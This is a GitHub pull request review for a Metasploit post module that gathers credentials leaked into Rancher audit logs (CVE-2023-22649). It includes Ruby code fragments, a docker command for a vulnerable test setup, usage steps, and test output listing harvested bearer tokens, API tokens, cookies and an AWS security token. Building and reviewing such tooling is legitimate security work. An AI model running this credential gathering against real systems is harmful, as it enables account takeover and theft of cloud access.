New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
new post module: rancher audit logs sensitive information leak (CVE-2023-22649) #18962
Conversation
} | ||
) | ||
) | ||
register_advanced_options [ |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
register_advanced_options [ | |
# docker install, and default path according to https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options | |
register_options [ |
I know this is unlikely to be changed, but in the event it needs to be changed, users should see it. I'd also be fine if this got left as an advanced option and the warning message contained a reference to changing the advanced option.
usernames_found += usernames | ||
end | ||
|
||
usernames_found.uniq.each do |username| |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Any reason not to store these directly?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
store them as in creds
? if so, because it's only a username and from my memory we don't store just usernames
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I made a couple of minor changes in f579ec7 to fix the table printing and document the version I used for testing. Once those changes pass the auto-tests, I'll get this landed. Thanks!
Testing Output (rancher v2.8.1):
metasploit-framework (S:2 J:1) post(linux/gather/rancher_audit_log_leak) > rerun
[*] Reloading module...
[+] Rancher log saved to: /home/smcintyre/.msf4/loot/20240410112703_default_192.168.159.13_rancher.api.log_376359.txt
[+] Found X-Api-Auth-Header Bearer TOTESLEGITLOLZ
[+] Found X-Api-Set-Cookie-Header: __cf_bm=qJZbh1XgMjrlnXDN97fsTR_Uj85He5TfPGtGug7xS5I-1712762186-1.0.1.1-wVGWMfCxXh8TpMzB4HCyiZ2YLwBclH3JggRCz_cOXoP4h_LKcIjXoTA_fjNjyg6DRd421yKhE.t222optKu5ZG2zZm.7oFnLDe8hw.jWNsc; path=/; expires=Wed, 10-Apr-24 15:46:26 GMT; domain=.digitalocean.com; HttpOnly; Secure; SameSite=None
[+] Found X-Api-Auth-Header token-876ss:v9q46nxt4grflb9mqn5s2d54bzscjstp48zzrpt6trdjkz52tns98q
[+] Found X-Amz-Security-Token FINDME
Leaked Information
==================
Field Value Location
----- ----- --------
Username admin Requests
X-Amz-Security-Token FINDME requestHeader
X-Api-Auth-Header Bearer TOTESLEGITLOLZ requestHeader
X-Api-Auth-Header token-876ss:v9q46nxt4grflb9mqn5s2d54bzscjstp48zzrpt6trdjkz52tns98q requestHeader
X-Api-Set-Cookie-Header __cf_bm=qJZbh1XgMjrlnXDN97fsTR_Uj85He5TfPGtGug7xS5I-1712762186-1.0.1.1-wVGWMfCxXh8TpMzB4HCyiZ2YLwBclH3JggRCz_cOXoP4h_LKcIjXoTA_fjNjyg6DRd421yK responseHeader
hE.t222optKu5ZG2zZm.7oFnLDe8hw.jWNsc; path=/; expires=Wed, 10-Apr-24 15:46:26 GMT; domain=.digitalocean.com; HttpOnly; Secure; SameSite=None
[*] Post module execution completed
metasploit-framework (S:2 J:1) post(linux/gather/rancher_audit_log_leak) >
### Install | ||
|
||
Run the following docker command: | ||
`docker run -d --restart=unless-stopped -p 80:80 -p 443:443 -e AUDIT_LEVEL=3 -v /var/log/rancher/auditlog:/var/log/auditlog --privileged rancher/rancher:v2.6.0` |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I had trouble getting this to work and ended up changing the version number to 2.8.1. It was definitely an issue with the docker image though and not the module.
Release NotesThis adds a post module to leverage CVE-2023-22649 which is a sensitive information leak in the rancher service's audit logs. |
Rancher versions between 2.6.0-2.6.13, 2.7.0-2.7.9, 2.8.0-2.8.1 inclusive
contain a vulnerability where sensitive data is leaked into the audit logs.
Rancher Audit Logging is an opt-in feature, only deployments that have it
enabled and have AUDIT_LEVEL set to 1 or above are impacted by this issue.
Tested against rancher 2.6.0.
Verification
List the steps needed to make sure this thing works
use post/linux/gather/rancher_audit_log_leak
set session [#]
run